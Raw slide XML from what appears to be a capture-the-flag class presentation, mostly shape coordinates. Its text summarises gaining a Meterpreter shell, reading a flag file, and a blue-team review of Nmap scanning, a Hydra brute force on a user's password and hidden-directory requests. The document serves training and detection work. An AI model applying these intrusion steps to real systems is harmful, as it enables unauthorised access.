              <a:gd name="connsiteX37" fmla="*/ 4387779 w 7775429"/>
              <a:gd name="connsiteY37" fmla="*/ 5946592 h 6051730"/>
              <a:gd name="connsiteX38" fmla="*/ 4510428 w 7775429"/>
              <a:gd name="connsiteY38" fmla="*/ 5875309 h 6051730"/>
              <a:gd name="connsiteX39" fmla="*/ 4903930 w 7775429"/>
              <a:gd name="connsiteY39" fmla="*/ 5194740 h 6051730"/>
              <a:gd name="connsiteX40" fmla="*/ 4903930 w 7775429"/>
              <a:gd name="connsiteY40" fmla="*/ 5055570 h 6051730"/>
              <a:gd name="connsiteX41" fmla="*/ 4510428 w 7775429"/>
              <a:gd name="connsiteY41" fmla="*/ 4375000 h 6051730"/>
              <a:gd name="connsiteX42" fmla="*/ 4458686 w 7775429"/>
              <a:gd name="connsiteY42" fmla="*/ 4322811 h 6051730"/>
              <a:gd name="connsiteX43" fmla="*/ 4452698 w 7775429"/>
              <a:gd name="connsiteY43" fmla="*/ 4320302 h 6051730"/>
              <a:gd name="connsiteX44" fmla="*/ 4484794 w 7775429"/>
              <a:gd name="connsiteY44" fmla="*/ 4264792 h 6051730"/>
              <a:gd name="connsiteX45" fmla="*/ 4508664 w 7775429"/>
              <a:gd name="connsiteY45" fmla="*/ 4223507 h 6051730"/>
              <a:gd name="connsiteX46" fmla="*/ 4483907 w 7775429"/>
              <a:gd name="connsiteY46" fmla="*/ 4213126 h 6051730"/>
              <a:gd name="connsiteX47" fmla="*/ 4442024 w 7775429"/>
              <a:gd name="connsiteY47" fmla="*/ 4207562 h 6051730"/>
              <a:gd name="connsiteX48" fmla="*/ 3552365 w 7775429"/>
              <a:gd name="connsiteY48" fmla="*/ 4207562 h 6051730"/>
              <a:gd name="connsiteX49" fmla="*/ 3415938 w 7775429"/>
              <a:gd name="connsiteY49" fmla="*/ 4287967 h 6051730"/>
              <a:gd name="connsiteX50" fmla="*/ 2970149 w 7775429"/>
              <a:gd name="connsiteY50" fmla="*/ 5055647 h 6051730"/>
              <a:gd name="connsiteX51" fmla="*/ 2970149 w 7775429"/>
              <a:gd name="connsiteY51" fmla="*/ 5212628 h 6051730"/>
              <a:gd name="connsiteX52" fmla="*/ 3117294 w 7775429"/>
              <a:gd name="connsiteY52" fmla="*/ 5466022 h 6051730"/>
              <a:gd name="connsiteX53" fmla="*/ 3138834 w 7775429"/>
              <a:gd name="connsiteY53" fmla="*/ 5503115 h 6051730"/>
              <a:gd name="connsiteX54" fmla="*/ 3039048 w 7775429"/>
              <a:gd name="connsiteY54" fmla="*/ 5503115 h 6051730"/>
              <a:gd name="connsiteX55" fmla="*/ 1437823 w 7775429"/>
              <a:gd name="connsiteY55" fmla="*/ 5503115 h 6051730"/>
              <a:gd name="connsiteX56" fmla="*/ 1112968 w 7775429"/>
              <a:gd name="connsiteY56" fmla="*/ 5311656 h 6051730"/>
              <a:gd name="connsiteX57" fmla="*/ 51474 w 7775429"/>
              <a:gd name="connsiteY57" fmla="*/ 3483691 h 6051730"/>
              <a:gd name="connsiteX58" fmla="*/ 51474 w 7775429"/>
              <a:gd name="connsiteY58" fmla="*/ 3109892 h 6051730"/>
              <a:gd name="connsiteX59" fmla="*/ 1112968 w 7775429"/>
              <a:gd name="connsiteY59" fmla="*/ 1281925 h 6051730"/>
              <a:gd name="connsiteX60" fmla="*/ 1437823 w 7775429"/>
              <a:gd name="connsiteY60" fmla="*/ 1090467 h 6051730"/>
              <a:gd name="connsiteX61" fmla="*/ 3556238 w 7775429"/>
              <a:gd name="connsiteY61" fmla="*/ 1090467 h 6051730"/>
              <a:gd name="connsiteX62" fmla="*/ 3885668 w 7775429"/>
              <a:gd name="connsiteY62" fmla="*/ 1281925 h 6051730"/>
              <a:gd name="connsiteX63" fmla="*/ 4942588 w 7775429"/>
              <a:gd name="connsiteY63" fmla="*/ 3109892 h 6051730"/>
              <a:gd name="connsiteX64" fmla="*/ 4942588 w 7775429"/>
              <a:gd name="connsiteY64" fmla="*/ 3483691 h 6051730"/>
              <a:gd name="connsiteX65" fmla="*/ 4550147 w 7775429"/>
              <a:gd name="connsiteY65" fmla="*/ 4162428 h 6051730"/>
              <a:gd name="connsiteX66" fmla="*/ 4517072 w 7775429"/>
              <a:gd name="connsiteY66" fmla="*/ 4219628 h 6051730"/>
              <a:gd name="connsiteX67" fmla="*/ 4518236 w 7775429"/>
              <a:gd name="connsiteY67" fmla="*/ 4220116 h 6051730"/>
              <a:gd name="connsiteX68" fmla="*/ 4576603 w 7775429"/>
              <a:gd name="connsiteY68" fmla="*/ 4278984 h 6051730"/>
              <a:gd name="connsiteX69" fmla="*/ 5020470 w 7775429"/>
              <a:gd name="connsiteY69" fmla="*/ 5046664 h 6051730"/>
              <a:gd name="connsiteX70" fmla="*/ 5020470 w 7775429"/>
              <a:gd name="connsiteY70" fmla="*/ 5203646 h 6051730"/>
              <a:gd name="connsiteX71" fmla="*/ 4576603 w 7775429"/>
              <a:gd name="connsiteY71" fmla="*/ 5971324 h 6051730"/>
              <a:gd name="connsiteX72" fmla="*/ 4438254 w 7775429"/>
              <a:gd name="connsiteY72" fmla="*/ 6051730 h 6051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7775429" h="6051730">
                <a:moveTo>
                  <a:pt x="6757888" y="3123835"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="5223007" y="3123835"/>
                  <a:pt x="5223007" y="3123835"/>
                  <a:pt x="5223007" y="3123835"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5145351" y="3123835"/>
                  <a:pt x="5044851" y="3069664"/>
                  <a:pt x="5003739" y="3001951"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4236300" y="1688315"/>
                  <a:pt x="4236300" y="1688315"/>
                  <a:pt x="4236300" y="1688315"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4199755" y="1616088"/>
                  <a:pt x="4199755" y="1507747"/>
                  <a:pt x="4236300" y="1435519"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5003739" y="121884"/>
                  <a:pt x="5003739" y="121884"/>
                  <a:pt x="5003739" y="121884"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5044851" y="54170"/>
                  <a:pt x="5145351" y="0"/>
                  <a:pt x="5223007" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6757888" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6840113" y="0"/>
                  <a:pt x="6940611" y="54170"/>
                  <a:pt x="6977155" y="121884"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7744595" y="1435519"/>
                  <a:pt x="7744595" y="1435519"/>
                  <a:pt x="7744595" y="1435519"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7785708" y="1507747"/>
                  <a:pt x="7785708" y="1616088"/>
                  <a:pt x="7744595" y="1688315"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6977155" y="3001951"/>
                  <a:pt x="6977155" y="3001951"/>
                  <a:pt x="6977155" y="3001951"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6940611" y="3069664"/>
                  <a:pt x="6840113" y="3123835"/>
                  <a:pt x="6757888" y="3123835"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3556238" y="5503115"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3556238" y="5503115"/>
                  <a:pt x="3556238" y="5503115"/>
                  <a:pt x="3291436" y="5503115"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3260544" y="5503115"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3231067" y="5452355"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3190023" y="5381674"/>
                  <a:pt x="3142263" y="5299428"/>
                  <a:pt x="3086688" y="5203722"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3061136" y="5161292"/>
                  <a:pt x="3061136" y="5106983"/>
                  <a:pt x="3086688" y="5064553"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3086688" y="5064553"/>
                  <a:pt x="3086688" y="5064553"/>
                  <a:pt x="3481893" y="4383983"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3505743" y="4339856"/>
                  <a:pt x="3553439" y="4312701"/>
                  <a:pt x="3602840" y="4312701"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3602840" y="4312701"/>
                  <a:pt x="3602840" y="4312701"/>
                  <a:pt x="4391548" y="4312701"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4404323" y="4312701"/>
                  <a:pt x="4416781" y="4314398"/>
                  <a:pt x="4428679" y="4317633"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4454216" y="4328340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4438609" y="4355333"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4297495" y="4599392"/>
                  <a:pt x="4116869" y="4911789"/>
                  <a:pt x="3885668" y="5311656"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3817038" y="5430178"/>
                  <a:pt x="3693500" y="5503115"/>
                  <a:pt x="3556238" y="5503115"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4438254" y="6051730"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="4438254" y="6051730"/>
                  <a:pt x="4438254" y="6051730"/>
                  <a:pt x="3548595" y="6051730"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3492871" y="6051730"/>
                  <a:pt x="3439071" y="6021098"/>
                  <a:pt x="3412169" y="5971324"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3412169" y="5971324"/>
                  <a:pt x="3412169" y="5971324"/>
                  <a:pt x="3173058" y="5559560"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3146046" y="5513043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3167300" y="5513043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3267756" y="5513043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3311396" y="5588194"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3478124" y="5875309"/>
                  <a:pt x="3478124" y="5875309"/>
                  <a:pt x="3478124" y="5875309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3501973" y="5919436"/>
                  <a:pt x="3549670" y="5946592"/>
                  <a:pt x="3599071" y="5946592"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4387779" y="5946592"/>
                  <a:pt x="4387779" y="5946592"/>
                  <a:pt x="4387779" y="5946592"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4438882" y="5946592"/>
                  <a:pt x="4484876" y="5919436"/>
                  <a:pt x="4510428" y="5875309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4903930" y="5194740"/>
                  <a:pt x="4903930" y="5194740"/>
                  <a:pt x="4903930" y="5194740"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4929483" y="5152309"/>
                  <a:pt x="4929483" y="5098000"/>
                  <a:pt x="4903930" y="5055570"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4510428" y="4375000"/>
                  <a:pt x="4510428" y="4375000"/>
                  <a:pt x="4510428" y="4375000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4497651" y="4352936"/>
                  <a:pt x="4479766" y="4335115"/>
                  <a:pt x="4458686" y="4322811"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4452698" y="4320302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4484794" y="4264792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4508664" y="4223507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4483907" y="4213126"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4470485" y="4209476"/>
                  <a:pt x="4456434" y="4207562"/>
                  <a:pt x="4442024" y="4207562"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3552365" y="4207562"/>
                  <a:pt x="3552365" y="4207562"/>
                  <a:pt x="3552365" y="4207562"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3496641" y="4207562"/>
                  <a:pt x="3442841" y="4238192"/>
                  <a:pt x="3415938" y="4287967"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2970149" y="5055647"/>
                  <a:pt x="2970149" y="5055647"/>
                  <a:pt x="2970149" y="5055647"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2941326" y="5103506"/>
                  <a:pt x="2941326" y="5164767"/>
                  <a:pt x="2970149" y="5212628"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3025872" y="5308588"/>
                  <a:pt x="3074630" y="5392553"/>
                  <a:pt x="3117294" y="5466022"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3138834" y="5503115"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3039048" y="5503115"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2728732" y="5503115"/>
                  <a:pt x="2232229" y="5503115"/>
                  <a:pt x="1437823" y="5503115"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1305136" y="5503115"/>
                  <a:pt x="1177024" y="5430178"/>
                  <a:pt x="1112968" y="5311656"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1112968" y="5311656"/>
                  <a:pt x="1112968" y="5311656"/>
                  <a:pt x="51474" y="3483691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-17158" y="3369728"/>
                  <a:pt x="-17158" y="3223855"/>
                  <a:pt x="51474" y="3109892"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="51474" y="3109892"/>
                  <a:pt x="51474" y="3109892"/>
                  <a:pt x="1112968" y="1281925"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1177024" y="1163403"/>
                  <a:pt x="1305136" y="1090467"/>
                  <a:pt x="1437823" y="1090467"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1437823" y="1090467"/>
                  <a:pt x="1437823" y="1090467"/>
                  <a:pt x="3556238" y="1090467"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3693500" y="1090467"/>
                  <a:pt x="3817038" y="1163403"/>
                  <a:pt x="3885668" y="1281925"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3885668" y="1281925"/>
                  <a:pt x="3885668" y="1281925"/>
                  <a:pt x="4942588" y="3109892"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5011220" y="3223855"/>
                  <a:pt x="5011220" y="3369728"/>
                  <a:pt x="4942588" y="3483691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4942588" y="3483691"/>
                  <a:pt x="4942588" y="3483691"/>
                  <a:pt x="4550147" y="4162428"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4517072" y="4219628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4518236" y="4220116"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4542015" y="4233996"/>
                  <a:pt x="4562190" y="4254096"/>
                  <a:pt x="4576603" y="4278984"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4576603" y="4278984"/>
                  <a:pt x="4576603" y="4278984"/>
                  <a:pt x="5020470" y="5046664"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5049294" y="5094524"/>
                  <a:pt x="5049294" y="5155785"/>
                  <a:pt x="5020470" y="5203646"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5020470" y="5203646"/>
                  <a:pt x="5020470" y="5203646"/>
                  <a:pt x="4576603" y="5971324"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4547780" y="6021098"/>
                  <a:pt x="4495898" y="6051730"/>
                  <a:pt x="4438254" y="605173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A3450E-8308-3179-004C-0BBA8B701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713" y="405083"/>
            <a:ext cx="4622829" cy="132665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000" b="1">
                <a:latin typeface="Avenir Next LT Pro"/>
              </a:rPr>
              <a:t>Open a Shell and Find the Flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000">
              <a:latin typeface="Avenir Next LT Pro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63F36-9A76-B243-AB60-E8D0E34D51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6575" y="2288669"/>
            <a:ext cx="3351928" cy="371140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>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri Light"/>
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>We returned to the command line and ran the Shell command.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>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri Light"/>
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Within the Meterpreter shell, we used the cd ../ (dot slash) command to move back several directories.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>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri Light"/>
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>We found the flag and used the cat command to read the contents of the file. The flag content was b1ng0w@5h1sn@m0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11C3262C-C809-59E4-9584-816211BEF1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1" r="15486"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4440986" y="4256923"/>
            <a:ext cx="2596989" cy="1387950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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A11B3B38-990C-3095-12AB-88A1C3B5B41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t="2061" b="5396"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7577250" y="1816074"/>
            <a:ext cx="3316022" cy="279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535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2A018-ABB9-5B13-A19C-CC0B6EDFF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34946"/>
            <a:ext cx="3689094" cy="5055904"/>
          </a:xfr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algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="TW Cen MT"/>
              </a:rPr>
              <a:t>BLUE TEAM OBJECTIVES</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="TW Cen MT"/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E32E097E-84B9-8376-E834-CADB5199A8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2468764"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4865862" y="304540"/>
          <a:ext cx="6949783" cy="57092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0420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1A9A8-9D5E-DA19-89E7-A8227693A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86387"/>
            <a:ext cx="10058400" cy="1450757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>
                <a:latin typeface="Avenir Next LT Pro"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Avenir Next LT Pro"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Identify the Initial Offensive Traffic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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11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60AAC329-A29A-9429-9B60-CA34DAA767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270" y="2008085"/>
            <a:ext cx="11607311" cy="430749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2" name="Callout: Bent Line 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95EDC8DB-7347-7023-2994-1C3C26A522AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-10800000" flipH="1" flipV="1">
            <a:off x="8700289" y="3346663"/>
            <a:ext cx="2517086" cy="590059"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout2">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18750"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val -59926"/>
              <a:gd name="adj4" fmla="val -14990"/>
              <a:gd name="adj5" fmla="val -59156"/>
              <a:gd name="adj6" fmla="val -4722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Height of the brute force attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Callout: Bent Line 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A2F2DB9-6093-6B4D-41AD-1A9D46E08DA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3619788" y="4643233"/>
            <a:ext cx="1749314" cy="576030"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout2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/>
              <a:t>Initial Nmap scan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093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97BDE-4832-08E4-AA6C-F98503874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297" y="124043"/>
            <a:ext cx="10435303" cy="1450757"/>
          </a:xfr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  <a:latin typeface="Avenir Next LT Pro"/>
              </a:rPr>
              <a:t>Find the Request for the Hidden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F07DF-93F9-6D98-22B3-3F40BE7AB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255" y="2108201"/>
            <a:ext cx="4597853" cy="1957491"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="45720" rIns="0" bIns="45720" rtlCol="0" anchor="t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/>
              <a:t>Which files were requested? What did they contain?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="486410" lvl="1" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>The most requested files were:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="669290" lvl="2" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://192.168.1.105/company_folders/secrets_folder</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="669290" lvl="2" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>http://127.0.0.1/servcr-status?auto= </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="669290" lvl="2" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="200660" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8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B0B9CCB-401A-AD79-4F18-41810AFFD9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911" b="33117"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5785909" y="2658682"/>
            <a:ext cx="6187152" cy="25570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4EB137-DC30-614C-5C38-04B32EDA1C62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="444500" y="4064000"/>
            <a:ext cx="5207000" cy="14670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669290" lvl="2" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>How many requests were made to this directory? At what time?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="1126490" lvl="3" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>There were 9982 requests for the hidden directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1126490" lvl="3" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Made at 3pm.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572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27D8F7-D1A8-5A04-0F22-DC5E4C44F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 b="1">
                <a:latin typeface="Avenir Next LT Pro"/>
              </a:rPr>
              <a:t>Identify the Brute Force Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Content Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{285C4122-0818-C930-E914-F7E180E29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4936067" cy="3425131"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="45720" rIns="0" bIns="45720" rtlCol="0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>
                <a:latin typeface="Avenir Next LT Pro"/>
              </a:rPr>
              <a:t> At 1450 there is a sharp uptick in HTTP Transactions.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>
                <a:latin typeface="Avenir Next LT Pro"/>
              </a:rPr>
              <a:t> This is indicative of a Brute Force Attack.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>
                <a:latin typeface="Avenir Next LT Pro"/>
              </a:rPr>
              <a:t> The large volume of traffic is a result of Hydra running through all the passwords in an effort to identify Ashton's.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ED6D967E-3047-9025-76B6-7A4B94EF6B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8" t="687" r="1344" b="4696"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6343077" y="1908700"/>
            <a:ext cx="5671638" cy="38974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247873-4684-07E9-5983-A4429A300430}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4975302" y="207598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058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1DCD4319-21CA-4165-A08D-D1E05DC37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CD1EA40-7116-4FCB-9369-70F29FAA9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592824" cy="32339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7A31F2-FB6B-D07E-9722-61903BE274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66648" y="382265"/>
            <a:ext cx="4929352" cy="23156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u="sng"/>
              <a:t>Find the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" err="1"/>
              <a:t>WebDav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng"/>
              <a:t> Connection</a:t>
            </a:r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F647E38-F93D-4661-8D77-CE13EEB65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1669B06-C46A-44F5-8C95-4AA9C8795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47" name="Rectangle 64">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
